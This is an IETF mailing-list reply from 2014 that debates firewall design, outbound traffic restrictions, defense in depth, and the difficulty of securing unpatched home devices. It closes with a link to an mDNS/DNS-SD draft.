Dear Fernando,
See comments inline:
On Jul 3, 2014, at 9:54 AM, Fernando Gont
<fernando(_at_)gont(_dot_)com(_dot_)ar> wrote:
On 07/03/2014 11:20 AM, Phillip Hallam-Baker wrote:
Yes firewalls do suck, but one of the reasons they suck a lot worse than
they need to is because there was a lot of resistance in the IETF to the
whole concept. And so any attempt to make IETF protocols firewall
friendly was often met with obstructionism.
And maybe not much guidance to make firewalls protocol-friendly, so to
speak?
This can also be considered the other way around as well.
[...]
Outbound traffic is relatively easy to deal with. All the firewall needs
to do is to decide whether the destination is one that isn't permitted.
And usually the right decision gets made - though there are many
enterprise firewalls locked down to only permit outbound port 80 and 443
and nothing else unless the packets come from a specially privileged
server.OK this is bad but at least the firewall logs tell us the extent
of the issue.
Is it really bad from a security point of view? -- at the end of the
day, it obeys the principle of "least privilege"....
Such restrictions do little to prevent data exfiltration. Even DNS can be used
and is fairly difficult to block.
[....]
Note that this is moving beyond firewalls. Firewalls are a weak security
solution because they only provide policy enforcement at the perimeter.
In a defense in depth strategy we would want every device in the network
to perform policy enforcement and policy audit.
The fact that you deploy a firewall at the perimeter doesn't mean you
can or shouldn't e.g. deploy a host-based firewall.
Agreed, but not all devices permit such a strategy. Take a fairly common
all-in-one fax/scanner/printer/media-reader as an example. It seems protecting
network perimeters will become more difficult, although IPv6 technology is able
to greatly improve upon this situation.
The following draft attempts to highlight some of the issues created by overly
simplistic approaches. One desire is to automatically place mDNS resources
into a homenet automated DNS permitting globally routable sessions to be
exchanged within a local network while at the same time expecting use of
multiple prefixes.
Who would want to receive a bill for international faxes sent night after
night? Or having their Internet-Ready TV with video conferencing spy on them?
Some of these devices will not receive timely updates, if ever. Even obtaining
source code may require owners to cover costs while still not repairing
vulnerabilities. In too many cases, establishing a solid perimeter remains
essential and is likely to remain the case for many years into the future.
http://tools.ietf.org/html/draft-otis-dnssd-mdns-xlink-04
Regards,
Douglas Otis